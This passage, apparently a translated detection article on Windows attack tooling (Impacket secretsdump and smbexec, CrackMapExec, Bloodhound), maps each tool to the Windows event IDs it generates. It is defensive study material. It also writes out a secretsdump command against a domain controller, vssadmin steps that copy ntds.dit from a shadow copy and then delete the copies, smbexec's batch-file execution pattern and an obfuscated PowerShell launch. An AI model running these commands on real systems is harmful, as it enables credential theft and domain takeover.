secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

Π’ΠΎ Π΄Π½Π΅Π²Π½ΠΈΠΊΠΎΡ‚ Π½Π° Windows Server 2016 ќС ја Π²ΠΈΠ΄ΠΈΠΌΠ΅ слСдната ΠΊΠ»ΡƒΡ‡Π½Π° Π½ΠΈΠ·Π° Π½Π° настани:

1. 4624 - далСчинско Π½Π°Ρ˜Π°Π²ΡƒΠ²Π°ΡšΠ΅.
2. 5145 - ΠΏΡ€ΠΎΠ²Π΅Ρ€ΠΊΠ° Π½Π° ΠΏΡ€Π°Π²Π°Ρ‚Π° Π·Π° пристап Π΄ΠΎ далСчинската услуга winreg.
3. 5145 - ΠΏΡ€ΠΎΠ²Π΅Ρ€ΠΊΠ° Π½Π° ΠΏΡ€Π°Π²Π°Ρ‚Π° Π·Π° пристап Π΄ΠΎ Π΄Π°Ρ‚ΠΎΡ‚Π΅ΠΊΠΈ Π²ΠΎ Π΄ΠΈΡ€Π΅ΠΊΡ‚ΠΎΡ€ΠΈΡƒΠΌΠΎΡ‚ System32. Π”Π°Ρ‚ΠΎΡ‚Π΅ΠΊΠ°Ρ‚Π° Π³ΠΎ ΠΈΠΌΠ° ΡΠ»ΡƒΡ‡Π°Ρ˜Π½ΠΎΡ‚ΠΎ ΠΈΠΌΠ΅ спомСнато ΠΏΠΎΠ³ΠΎΡ€Π΅.
4. 4688 - создавањС процСс cmd.exe ΡˆΡ‚ΠΎ Π³ΠΎ стартува vssadmin:

β€œC:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - создавањС процСс со ΠΊΠΎΠΌΠ°Π½Π΄Π°Ρ‚Π°:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

6. 4688 - создавањС процСс со ΠΊΠΎΠΌΠ°Π½Π΄Π°Ρ‚Π°:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

7. 4688 - создавањС процСс со ΠΊΠΎΠΌΠ°Π½Π΄Π°Ρ‚Π°:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

БмбСксСц

Како ΠΈ ΠΌΠ½ΠΎΠ³Ρƒ Π°Π»Π°Ρ‚ΠΊΠΈ ΠΏΠΎ Π΅ΠΊΡΠΏΠ»ΠΎΠ°Ρ‚Π°Ρ†ΠΈΡ˜Π°, Impacket ΠΈΠΌΠ° ΠΌΠΎΠ΄ΡƒΠ»ΠΈ Π·Π° далСчинско ΠΈΠ·Π²Ρ€ΡˆΡƒΠ²Π°ΡšΠ΅ Π½Π° ΠΊΠΎΠΌΠ°Π½Π΄ΠΈ. ЌС сС фокусирамС Π½Π° smbexec, кој ΠΎΠ±Π΅Π·Π±Π΅Π΄ΡƒΠ²Π° ΠΈΠ½Ρ‚Π΅Ρ€Π°ΠΊΡ‚ΠΈΠ²Π½Π° ΠΊΠΎΠΌΠ°Π½Π΄Π½Π° ΠΎΠ±Π²ΠΈΠ²ΠΊΠ° Π½Π° ΠΎΠ΄Π΄Π°Π»Π΅Ρ‡Π΅Π½Π° машина. Овој ΠΌΠΎΠ΄ΡƒΠ» исто Ρ‚Π°ΠΊΠ° Π±Π°Ρ€Π° Π°Π²Ρ‚Π΅Π½Ρ‚ΠΈΠΊΠ°Ρ†ΠΈΡ˜Π° ΠΏΡ€Π΅ΠΊΡƒ SMB, ΠΈΠ»ΠΈ со Π»ΠΎΠ·ΠΈΠ½ΠΊΠ° ΠΈΠ»ΠΈ Ρ…Π°Ρˆ Π½Π° Π»ΠΎΠ·ΠΈΠ½ΠΊΠ°. На сл. На слика 3 Π³Π»Π΅Π΄Π°ΠΌΠ΅ ΠΏΡ€ΠΈΠΌΠ΅Ρ€ ΠΊΠ°ΠΊΠΎ Ρ„ΡƒΠ½ΠΊΡ†ΠΈΠΎΠ½ΠΈΡ€Π° Ρ‚Π°ΠΊΠ²Π°Ρ‚Π° Π°Π»Π°Ρ‚ΠΊΠ°, Π²ΠΎ овој ΡΠ»ΡƒΡ‡Π°Ρ˜ Ρ‚ΠΎΠ° Π΅ Π»ΠΎΠΊΠ°Π»Π½Π°Ρ‚Π° администраторска ΠΊΠΎΠ½Π·ΠΎΠ»Π°.

Како Π΄Π° ΠΎΡ‚ΠΊΡ€ΠΈΠ΅Ρ‚Π΅ Π½Π°ΠΏΠ°Π΄ΠΈ Π½Π° инфраструктурата Π½Π° Windows: ΠΏΡ€ΠΎΡƒΡ‡ΡƒΠ²Π°ΡšΠ΅ Π½Π° хакСрски Π°Π»Π°Ρ‚ΠΊΠΈ
ΠžΡ€ΠΈΠ·. 3. Π˜Π½Ρ‚Π΅Ρ€Π°ΠΊΡ‚ΠΈΠ²Π½Π° smbexec ΠΊΠΎΠ½Π·ΠΎΠ»Π°

ΠŸΡ€Π²ΠΈΠΎΡ‚ Ρ‡Π΅ΠΊΠΎΡ€ Π½Π° smbexec ΠΏΠΎ Π°Π²Ρ‚Π΅Π½Ρ‚ΠΈΠΊΠ°Ρ†ΠΈΡ˜Π°Ρ‚Π° Π΅ Π΄Π° сС ΠΎΡ‚Π²ΠΎΡ€ΠΈ SCM со ΠΊΠΎΠΌΠ°Π½Π΄Π°Ρ‚Π° OpenSCManagerW (15). ΠŸΡ€Π°ΡˆΠ°ΡšΠ΅Ρ‚ΠΎ Π΅ Π·Π°Π±Π΅Π»Π΅ΠΆΠ»ΠΈΠ²ΠΎ: ΠΏΠΎΠ»Π΅Ρ‚ΠΎ MachineName Π΅ DUMMY.

Како Π΄Π° ΠΎΡ‚ΠΊΡ€ΠΈΠ΅Ρ‚Π΅ Π½Π°ΠΏΠ°Π΄ΠΈ Π½Π° инфраструктурата Π½Π° Windows: ΠΏΡ€ΠΎΡƒΡ‡ΡƒΠ²Π°ΡšΠ΅ Π½Π° хакСрски Π°Π»Π°Ρ‚ΠΊΠΈ
ΠžΡ€ΠΈΠ·. 4. Π‘Π°Ρ€Π°ΡšΠ΅ Π·Π° ΠΎΡ‚Π²ΠΎΡ€Π°ΡšΠ΅ Π½Π° Π£ΠΏΡ€Π°Π²Π½ΠΈΠΊΠΎΡ‚ Π·Π° ΠΊΠΎΠ½Ρ‚Ρ€ΠΎΠ»Π° Π½Π° услуги

Π‘Π»Π΅Π΄Π½ΠΎ, услугата сС ΠΊΡ€Π΅ΠΈΡ€Π° со помош Π½Π° ΠΊΠΎΠΌΠ°Π½Π΄Π°Ρ‚Π° CreateServiceW (12). Π’ΠΎ ΡΠ»ΡƒΡ‡Π°Ρ˜ΠΎΡ‚ Π½Π° smbexec, ΠΌΠΎΠΆΠ΅ΠΌΠ΅ Π΄Π° ја Π²ΠΈΠ΄ΠΈΠΌΠ΅ истата Π»ΠΎΠ³ΠΈΠΊΠ° Π½Π° ΠΊΠΎΠ½ΡΡ‚Ρ€ΡƒΠΊΡ†ΠΈΡ˜Π° Π½Π° ΠΊΠΎΠΌΠ°Π½Π΄Π°Ρ‚Π° сСкој ΠΏΠ°Ρ‚. На сл. 5 Π·Π΅Π»Π΅Π½Π°Ρ‚Π° ΠΎΠ·Π½Π°Ρ‡ΡƒΠ²Π° Π½Π΅ΠΏΡ€ΠΎΠΌΠ΅Π½Π»ΠΈΠ²ΠΈ ΠΊΠΎΠΌΠ°Π½Π΄Π½ΠΈ ΠΏΠ°Ρ€Π°ΠΌΠ΅Ρ‚Ρ€ΠΈ, ΠΆΠΎΠ»Ρ‚Π°Ρ‚Π° ΠΎΠ·Π½Π°Ρ‡ΡƒΠ²Π° ΡˆΡ‚ΠΎ ΠΌΠΎΠΆΠ΅ Π΄Π° ΠΏΡ€ΠΎΠΌΠ΅Π½ΠΈ Π½Π°ΠΏΠ°Ρ“Π°Ρ‡ΠΎΡ‚. ЛСсно Π΅ Π΄Π° сС Π²ΠΈΠ΄ΠΈ Π΄Π΅ΠΊΠ° ΠΈΠΌΠ΅Ρ‚ΠΎ Π½Π° ΠΈΠ·Π²Ρ€ΡˆΠ½Π°Ρ‚Π° Π΄Π°Ρ‚ΠΎΡ‚Π΅ΠΊΠ°, Π½Π΅Π³ΠΎΠ²ΠΈΠΎΡ‚ Π΄ΠΈΡ€Π΅ΠΊΡ‚ΠΎΡ€ΠΈΡƒΠΌ ΠΈ ΠΈΠ·Π»Π΅Π·Π½Π°Ρ‚Π° Π΄Π°Ρ‚ΠΎΡ‚Π΅ΠΊΠ° ΠΌΠΎΠΆΠ΅ Π΄Π° сС смСнат, Π½ΠΎ останатото Π΅ ΠΌΠ½ΠΎΠ³Ρƒ ΠΏΠΎΡ‚Π΅ΡˆΠΊΠΎ Π΄Π° сС ΠΏΡ€ΠΎΠΌΠ΅Π½ΠΈ Π±Π΅Π· Π΄Π° сС Π½Π°Ρ€ΡƒΡˆΠΈ Π»ΠΎΠ³ΠΈΠΊΠ°Ρ‚Π° Π½Π° ΠΌΠΎΠ΄ΡƒΠ»ΠΎΡ‚ Impacket.

Како Π΄Π° ΠΎΡ‚ΠΊΡ€ΠΈΠ΅Ρ‚Π΅ Π½Π°ΠΏΠ°Π΄ΠΈ Π½Π° инфраструктурата Π½Π° Windows: ΠΏΡ€ΠΎΡƒΡ‡ΡƒΠ²Π°ΡšΠ΅ Π½Π° хакСрски Π°Π»Π°Ρ‚ΠΊΠΈ
ΠžΡ€ΠΈΠ·. 5. ΠŸΠΎΠ±Π°Ρ€Π°Ρ˜Ρ‚Π΅ Π΄Π° ΠΊΡ€Π΅ΠΈΡ€Π°Ρ‚Π΅ услуга ΠΊΠΎΡ€ΠΈΡΡ‚Π΅Ρ˜ΡœΠΈ Π£ΠΏΡ€Π°Π²Π½ΠΈΠΊ Π·Π° ΠΊΠΎΠ½Ρ‚Ρ€ΠΎΠ»Π° Π½Π° услуги

Smbexec исто Ρ‚Π°ΠΊΠ° остава ΠΎΡ‡ΠΈΠ³Π»Π΅Π΄Π½ΠΈ Ρ‚Ρ€Π°Π³ΠΈ Π²ΠΎ Π΄Π½Π΅Π²Π½ΠΈΠΊΠΎΡ‚ Π·Π° настани Π½Π° Windows. Π’ΠΎ Π΄Π½Π΅Π²Π½ΠΈΠΊΠΎΡ‚ Π½Π° Windows Server 2016 Π·Π° ΠΈΠ½Ρ‚Π΅Ρ€Π°ΠΊΡ‚ΠΈΠ²Π½Π°Ρ‚Π° ΠΊΠΎΠΌΠ°Π½Π΄Π½Π° школка со ΠΊΠΎΠΌΠ°Π½Π΄Π°Ρ‚Π° ipconfig, ќС ја Π²ΠΈΠ΄ΠΈΠΌΠ΅ слСдната ΠΊΠ»ΡƒΡ‡Π½Π° Π½ΠΈΠ·Π° Π½Π° настани:

1. 4697 β€” ΠΈΠ½ΡΡ‚Π°Π»Π°Ρ†ΠΈΡ˜Π° Π½Π° услугата Π½Π° ΠΌΠ°ΡˆΠΈΠ½Π°Ρ‚Π° Π½Π° ΠΆΡ€Ρ‚Π²Π°Ρ‚Π°:

%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

2. 4688 - ΠΊΡ€Π΅ΠΈΡ€Π°ΡšΠ΅ Π½Π° процСсот cmd.exe со Π°Ρ€Π³ΡƒΠΌΠ΅Π½Ρ‚ΠΈΡ‚Π΅ ΠΎΠ΄ Ρ‚ΠΎΡ‡ΠΊΠ° 1.
3. 5145 - ΠΏΡ€ΠΎΠ²Π΅Ρ€ΠΊΠ° Π½Π° ΠΏΡ€Π°Π²Π°Ρ‚Π° Π·Π° пристап Π΄ΠΎ Π΄Π°Ρ‚ΠΎΡ‚Π΅ΠΊΠ°Ρ‚Π° __output Π²ΠΎ Π΄ΠΈΡ€Π΅ΠΊΡ‚ΠΎΡ€ΠΈΡƒΠΌΠΎΡ‚ C$.
4. 4697 β€” ΠΈΠ½ΡΡ‚Π°Π»Π°Ρ†ΠΈΡ˜Π° Π½Π° услугата Π½Π° ΠΌΠ°ΡˆΠΈΠ½Π°Ρ‚Π° Π½Π° ΠΆΡ€Ρ‚Π²Π°Ρ‚Π°.

%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - ΠΊΡ€Π΅ΠΈΡ€Π°ΡšΠ΅ Π½Π° процСсот cmd.exe со Π°Ρ€Π³ΡƒΠΌΠ΅Π½Ρ‚ΠΈΡ‚Π΅ ΠΎΠ΄ Ρ‚ΠΎΡ‡ΠΊΠ° 4.
6. 5145 - ΠΏΡ€ΠΎΠ²Π΅Ρ€ΠΊΠ° Π½Π° ΠΏΡ€Π°Π²Π°Ρ‚Π° Π·Π° пристап Π΄ΠΎ Π΄Π°Ρ‚ΠΎΡ‚Π΅ΠΊΠ°Ρ‚Π° __output Π²ΠΎ Π΄ΠΈΡ€Π΅ΠΊΡ‚ΠΎΡ€ΠΈΡƒΠΌΠΎΡ‚ C$.

Π˜ΠΌΠΏΠ°ΠΊΠ΅Ρ‚ Π΅ основа Π·Π° Ρ€Π°Π·Π²ΠΎΡ˜ Π½Π° Π°Π»Π°Ρ‚ΠΊΠΈ Π·Π° Π½Π°ΠΏΠ°Π΄. Π“ΠΈ ΠΏΠΎΠ΄Π΄Ρ€ΠΆΡƒΠ²Π° скоро ситС ΠΏΡ€ΠΎΡ‚ΠΎΠΊΠΎΠ»ΠΈ Π²ΠΎ Windows инфраструктурата ΠΈ Π²ΠΎ исто Π²Ρ€Π΅ΠΌΠ΅ ΠΈΠΌΠ° свои карактСристични карактСристики. Π•Π²Π΅ спСцифични Π±Π°Ρ€Π°ΡšΠ° winreg ΠΈ ΡƒΠΏΠΎΡ‚Ρ€Π΅Π±Π°Ρ‚Π° Π½Π° SCM API со карактСристично Ρ„ΠΎΡ€ΠΌΠΈΡ€Π°ΡšΠ΅ ΠΊΠΎΠΌΠ°Π½Π΄ΠΈ, ΠΈ Ρ„ΠΎΡ€ΠΌΠ°Ρ‚ΠΎΡ‚ Π½Π° ΠΈΠΌΠ΅Ρ‚ΠΎ Π½Π° Π΄Π°Ρ‚ΠΎΡ‚Π΅ΠΊΠ°Ρ‚Π° ΠΈ SMB share SYSTEM32.

CRACKMAPEXEC

Алатката CME Π΅ Π΄ΠΈΠ·Π°Ρ˜Π½ΠΈΡ€Π°Π½Π° првСнствСно Π΄Π° Π³ΠΈ Π°Π²Ρ‚ΠΎΠΌΠ°Ρ‚ΠΈΠ·ΠΈΡ€Π° ΠΎΠ½ΠΈΠ΅ рутински Π΄Π΅Ρ˜ΡΡ‚Π²Π° ΡˆΡ‚ΠΎ Π½Π°ΠΏΠ°Ρ“Π°Ρ‡ΠΎΡ‚ Ρ‚Ρ€Π΅Π±Π° Π΄Π° Π³ΠΈ ΠΈΠ·Π²Ρ€ΡˆΠΈ Π·Π° Π΄Π° Π½Π°ΠΏΡ€Π΅Π΄ΡƒΠ²Π° Π²ΠΎ ΠΌΡ€Π΅ΠΆΠ°Ρ‚Π°. Π’ΠΈ ΠΎΠ²ΠΎΠ·ΠΌΠΎΠΆΡƒΠ²Π° Π΄Π° Ρ€Π°Π±ΠΎΡ‚ΠΈΡ‚Π΅ Π·Π°Π΅Π΄Π½ΠΎ со Π΄ΠΎΠ±Ρ€ΠΎ ΠΏΠΎΠ·Π½Π°Ρ‚ΠΈΠΎΡ‚ Π°Π³Π΅Π½Ρ‚ Π½Π° Empire ΠΈ Meterpreter. Π—Π° Ρ‚Π°Ρ˜Π½ΠΎ ΠΈΠ·Π²Ρ€ΡˆΡƒΠ²Π°ΡšΠ΅ Π½Π° ΠΊΠΎΠΌΠ°Π½Π΄ΠΈΡ‚Π΅, CME ΠΌΠΎΠΆΠ΅ Π΄Π° Π³ΠΈ Π·Π°ΠΌΠ°Π³Π»ΠΈ. ΠšΠΎΡ€ΠΈΡΡ‚Π΅Ρ˜ΡœΠΈ Bloodhound (посСбна Π°Π»Π°Ρ‚ΠΊΠ° Π·Π° ΠΈΠ·Π²ΠΈΠ΄ΡƒΠ²Π°ΡšΠ΅), Π½Π°ΠΏΠ°Ρ“Π°Ρ‡ΠΎΡ‚ ΠΌΠΎΠΆΠ΅ Π΄Π° Π³ΠΎ Π°Π²Ρ‚ΠΎΠΌΠ°Ρ‚ΠΈΠ·ΠΈΡ€Π° ΠΏΡ€Π΅Π±Π°Ρ€ΡƒΠ²Π°ΡšΠ΅Ρ‚ΠΎ Π·Π° Π°ΠΊΡ‚ΠΈΠ²Π½Π° сСсија Π½Π° администратор Π½Π° Π΄ΠΎΠΌΠ΅Π½.

bloodhound

Bloodhound, ΠΊΠ°ΠΊΠΎ ΡΠ°ΠΌΠΎΡΡ‚ΠΎΡ˜Π½Π° Π°Π»Π°Ρ‚ΠΊΠ°, ΠΎΠ²ΠΎΠ·ΠΌΠΎΠΆΡƒΠ²Π° Π½Π°ΠΏΡ€Π΅Π΄Π½ΠΎ ΠΈΠ·Π²ΠΈΠ΄ΡƒΠ²Π°ΡšΠ΅ Π²ΠΎ Ρ€Π°ΠΌΠΊΠΈΡ‚Π΅ Π½Π° ΠΌΡ€Π΅ΠΆΠ°Ρ‚Π°. Π‘ΠΎΠ±ΠΈΡ€Π° ΠΏΠΎΠ΄Π°Ρ‚ΠΎΡ†ΠΈ Π·Π° корисници, машини, Π³Ρ€ΡƒΠΏΠΈ, сСсии ΠΈ сС доставува ΠΊΠ°ΠΊΠΎ скрипта PowerShell ΠΈΠ»ΠΈ Π±ΠΈΠ½Π°Ρ€Π½Π° Π΄Π°Ρ‚ΠΎΡ‚Π΅ΠΊΠ°. LDAP ΠΈΠ»ΠΈ SMB-Π±Π°Π·ΠΈΡ€Π°Π½ΠΈ ΠΏΡ€ΠΎΡ‚ΠΎΠΊΠΎΠ»ΠΈ сС користат Π·Π° ΡΠΎΠ±ΠΈΡ€Π°ΡšΠ΅ ΠΈΠ½Ρ„ΠΎΡ€ΠΌΠ°Ρ†ΠΈΠΈ. ΠœΠΎΠ΄ΡƒΠ»ΠΎΡ‚ Π·Π° ΠΈΠ½Ρ‚Π΅Π³Ρ€Π°Ρ†ΠΈΡ˜Π° CME Π΄ΠΎΠ·Π²ΠΎΠ»ΡƒΠ²Π° Bloodhound Π΄Π° сС ΠΏΡ€Π΅Π·Π΅ΠΌΠ΅ Π²ΠΎ ΠΌΠ°ΡˆΠΈΠ½Π°Ρ‚Π° Π½Π° ΠΆΡ€Ρ‚Π²Π°Ρ‚Π°, Π΄Π° Ρ€Π°Π±ΠΎΡ‚ΠΈ ΠΈ Π΄Π° Π³ΠΈ ΠΏΡ€ΠΈΠΌΠ° собранитС ΠΏΠΎΠ΄Π°Ρ‚ΠΎΡ†ΠΈ ΠΏΠΎ ΠΈΠ·Π²Ρ€ΡˆΡƒΠ²Π°ΡšΠ΅Ρ‚ΠΎ, Π° со Ρ‚ΠΎΠ° Π΄Π° Π³ΠΈ Π°Π²Ρ‚ΠΎΠΌΠ°Ρ‚ΠΈΠ·ΠΈΡ€Π° Π΄Π΅Ρ˜ΡΡ‚Π²Π°Ρ‚Π° Π²ΠΎ систСмот ΠΈ Π΄Π° Π³ΠΈ Π½Π°ΠΏΡ€Π°Π²ΠΈ ΠΏΠΎΠΌΠ°Π»ΠΊΡƒ Π·Π°Π±Π΅Π»Π΅ΠΆΠ»ΠΈΠ²ΠΈ. Π“Ρ€Π°Ρ„ΠΈΡ‡ΠΊΠ°Ρ‚Π° ΠΎΠ±Π²ΠΈΠ²ΠΊΠ° Bloodhound Π³ΠΈ ΠΏΡ€ΠΈΠΊΠ°ΠΆΡƒΠ²Π° собранитС ΠΏΠΎΠ΄Π°Ρ‚ΠΎΡ†ΠΈ Π²ΠΎ Ρ„ΠΎΡ€ΠΌΠ° Π½Π° Π³Ρ€Π°Ρ„ΠΈΠΊΠΎΠ½ΠΈ, ΡˆΡ‚ΠΎ Π²ΠΈ ΠΎΠ²ΠΎΠ·ΠΌΠΎΠΆΡƒΠ²Π° Π΄Π° ја ΠΏΡ€ΠΎΠ½Π°Ρ˜Π΄Π΅Ρ‚Π΅ Π½Π°Ρ˜ΠΊΡ€Π°Ρ‚ΠΊΠ°Ρ‚Π° ΠΏΠ°Ρ‚Π΅ΠΊΠ° ΠΎΠ΄ ΠΌΠ°ΡˆΠΈΠ½Π°Ρ‚Π° Π½Π° Π½Π°ΠΏΠ°Ρ“Π°Ρ‡ΠΎΡ‚ Π΄ΠΎ администраторот Π½Π° Π΄ΠΎΠΌΠ΅Π½ΠΎΡ‚.

Како Π΄Π° ΠΎΡ‚ΠΊΡ€ΠΈΠ΅Ρ‚Π΅ Π½Π°ΠΏΠ°Π΄ΠΈ Π½Π° инфраструктурата Π½Π° Windows: ΠΏΡ€ΠΎΡƒΡ‡ΡƒΠ²Π°ΡšΠ΅ Π½Π° хакСрски Π°Π»Π°Ρ‚ΠΊΠΈ
ΠžΡ€ΠΈΠ·. 6. Π˜Π½Ρ‚Π΅Ρ€Ρ„Π΅Ρ˜Ρ Bloodhound

Π—Π° Π΄Π° Ρ€Π°Π±ΠΎΡ‚ΠΈ Π½Π° ΠΌΠ°ΡˆΠΈΠ½Π°Ρ‚Π° Π½Π° ΠΆΡ€Ρ‚Π²Π°Ρ‚Π°, ΠΌΠΎΠ΄ΡƒΠ»ΠΎΡ‚ создава Π·Π°Π΄Π°Ρ‡Π° ΠΊΠΎΡ€ΠΈΡΡ‚Π΅Ρ˜ΡœΠΈ ATSVC ΠΈ SMB. ATSVC Π΅ ΠΈΠ½Ρ‚Π΅Ρ€Ρ„Π΅Ρ˜Ρ Π·Π° Ρ€Π°Π±ΠΎΡ‚Π° со Windows Task Scheduler. CME ја користи ΡΠ²ΠΎΡ˜Π°Ρ‚Π° Ρ„ΡƒΠ½ΠΊΡ†ΠΈΡ˜Π° NetrJobAdd(1) Π·Π° ΠΊΡ€Π΅ΠΈΡ€Π°ΡšΠ΅ Π·Π°Π΄Π°Ρ‡ΠΈ ΠΏΡ€Π΅ΠΊΡƒ ΠΌΡ€Π΅ΠΆΠ°Ρ‚Π°. ΠŸΡ€ΠΈΠΌΠ΅Ρ€ Π·Π° Ρ‚ΠΎΠ° ΡˆΡ‚ΠΎ ΠΈΡΠΏΡ€Π°ΡœΠ° ΠΌΠΎΠ΄ΡƒΠ»ΠΎΡ‚ CME Π΅ ΠΏΡ€ΠΈΠΊΠ°ΠΆΠ°Π½ Π½Π° сл. 7: Ова Π΅ ΠΊΠΎΠΌΠ°Π½Π΄Π΅Π½ ΠΏΠΎΠ²ΠΈΠΊ cmd.exe ΠΈ Π·Π°ΠΌΠ°Ρ‚Π΅Π½ ΠΊΠΎΠ΄ Π²ΠΎ Ρ„ΠΎΡ€ΠΌΠ° Π½Π° Π°Ρ€Π³ΡƒΠΌΠ΅Π½Ρ‚ΠΈ Π²ΠΎ XML Ρ„ΠΎΡ€ΠΌΠ°Ρ‚.

Како Π΄Π° ΠΎΡ‚ΠΊΡ€ΠΈΠ΅Ρ‚Π΅ Π½Π°ΠΏΠ°Π΄ΠΈ Π½Π° инфраструктурата Π½Π° Windows: ΠΏΡ€ΠΎΡƒΡ‡ΡƒΠ²Π°ΡšΠ΅ Π½Π° хакСрски Π°Π»Π°Ρ‚ΠΊΠΈ
Π‘Π».7. ΠšΡ€Π΅ΠΈΡ€Π°ΡšΠ΅ Π·Π°Π΄Π°Ρ‡Π° ΠΏΡ€Π΅ΠΊΡƒ CME

ΠžΡ‚ΠΊΠ°ΠΊΠΎ Π·Π°Π΄Π°Ρ‡Π°Ρ‚Π° Π΅ поднСсСна Π·Π° ΠΈΠ·Π²Ρ€ΡˆΡƒΠ²Π°ΡšΠ΅, ΠΌΠ°ΡˆΠΈΠ½Π°Ρ‚Π° Π½Π° ΠΆΡ€Ρ‚Π²Π°Ρ‚Π° Π³ΠΎ стартува самиот Bloodhound, Π° Ρ‚ΠΎΠ° ΠΌΠΎΠΆΠ΅ Π΄Π° сС Π²ΠΈΠ΄ΠΈ Π²ΠΎ ΡΠΎΠΎΠ±Ρ€Π°ΡœΠ°Ρ˜ΠΎΡ‚. ΠœΠΎΠ΄ΡƒΠ»ΠΎΡ‚ сС ΠΊΠ°Ρ€Π°ΠΊΡ‚Π΅Ρ€ΠΈΠ·ΠΈΡ€Π° со LDAP Π±Π°Ρ€Π°ΡšΠ° Π·Π° Π΄Π° сС Π΄ΠΎΠ±ΠΈΡ˜Π°Ρ‚ стандардни Π³Ρ€ΡƒΠΏΠΈ, список Π½Π° ситС машини ΠΈ корисници Π²ΠΎ Π΄ΠΎΠΌΠ΅Π½ΠΎΡ‚ ΠΈ Π΄Π° сС Π΄ΠΎΠ±ΠΈΡ˜Π°Ρ‚ ΠΈΠ½Ρ„ΠΎΡ€ΠΌΠ°Ρ†ΠΈΠΈ Π·Π° Π°ΠΊΡ‚ΠΈΠ²Π½ΠΈΡ‚Π΅ кориснички сСсии ΠΏΡ€Π΅ΠΊΡƒ Π±Π°Ρ€Π°ΡšΠ΅Ρ‚ΠΎ SRVSVC NetSessEnum.

Како Π΄Π° ΠΎΡ‚ΠΊΡ€ΠΈΠ΅Ρ‚Π΅ Π½Π°ΠΏΠ°Π΄ΠΈ Π½Π° инфраструктурата Π½Π° Windows: ΠΏΡ€ΠΎΡƒΡ‡ΡƒΠ²Π°ΡšΠ΅ Π½Π° хакСрски Π°Π»Π°Ρ‚ΠΊΠΈ
ΠžΡ€ΠΈΠ·. 8. Π”ΠΎΠ±ΠΈΠ²Π°ΡšΠ΅ листа Π½Π° Π°ΠΊΡ‚ΠΈΠ²Π½ΠΈ сСсии ΠΏΡ€Π΅ΠΊΡƒ SMB

Π”ΠΎΠΏΠΎΠ»Π½ΠΈΡ‚Π΅Π»Π½ΠΎ, ΡΡ‚Π°Ρ€Ρ‚ΡƒΠ²Π°ΡšΠ΅Ρ‚ΠΎ Π½Π° Bloodhound Π½Π° ΠΌΠ°ΡˆΠΈΠ½Π°Ρ‚Π° Π½Π° ΠΆΡ€Ρ‚Π²Π°Ρ‚Π° со ΠΎΠ²ΠΎΠ·ΠΌΠΎΠΆΠ΅Π½Π° Ρ€Π΅Π²ΠΈΠ·ΠΈΡ˜Π° Π΅ ΠΏΡ€ΠΈΠ΄Ρ€ΡƒΠΆΠ΅Π½ΠΎ со настан со ID 4688 (создавањС процСс) ΠΈ ΠΈΠΌΠ΅ Π½Π° процСсот Β«C:WindowsSystem32cmd.exeΒ». Она ΡˆΡ‚ΠΎ Π΅ Π·Π°Π±Π΅Π»Π΅ΠΆΠ»ΠΈΠ²ΠΎ Π·Π° Ρ‚ΠΎΠ° сС Π°Ρ€Π³ΡƒΠΌΠ΅Π½Ρ‚ΠΈΡ‚Π΅ Π½Π° ΠΊΠΎΠΌΠ°Π½Π΄Π½Π°Ρ‚Π° линија:

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "

Enum_avproducts

ΠœΠΎΠ΄ΡƒΠ»ΠΎΡ‚ enum_avproducts Π΅ ΠΌΠ½ΠΎΠ³Ρƒ интСрСсСн ΠΎΠ΄ Π³Π»Π΅Π΄Π½Π° Ρ‚ΠΎΡ‡ΠΊΠ° Π½Π° функционалност ΠΈ ΠΈΠΌΠΏΠ»Π΅ΠΌΠ΅Π½Ρ‚Π°Ρ†ΠΈΡ˜Π°. WMI Π²ΠΈ ΠΎΠ²ΠΎΠ·ΠΌΠΎΠΆΡƒΠ²Π° Π΄Π° Π³ΠΎ користитС Ρ˜Π°Π·ΠΈΠΊΠΎΡ‚ Π·Π° ΠΏΡ€Π΅Π±Π°Ρ€ΡƒΠ²Π°ΡšΠ΅ Π½Π° WQL Π·Π° Π²Ρ€Π°ΡœΠ°ΡšΠ΅ Π½Π° ΠΏΠΎΠ΄Π°Ρ‚ΠΎΡ†ΠΈ ΠΎΠ΄ Ρ€Π°Π·Π»ΠΈΡ‡Π½ΠΈ ΠΎΠ±Ρ˜Π΅ΠΊΡ‚ΠΈ Π½Π° Windows, ΡˆΡ‚ΠΎ Π²ΠΎ ΡΡƒΡˆΡ‚ΠΈΠ½Π° Π³ΠΎ користи овој CME ΠΌΠΎΠ΄ΡƒΠ». Вој Π³Π΅Π½Π΅Ρ€ΠΈΡ€Π° ΠΏΡ€Π°ΡˆΠ°ΡšΠ° Π΄ΠΎ класитС AntiSpywareProduct ΠΈ AntiМirusProduct Π·Π° Π°Π»Π°Ρ‚ΠΊΠΈΡ‚Π΅ Π·Π° Π·Π°ΡˆΡ‚ΠΈΡ‚Π° инсталирани Π½Π° 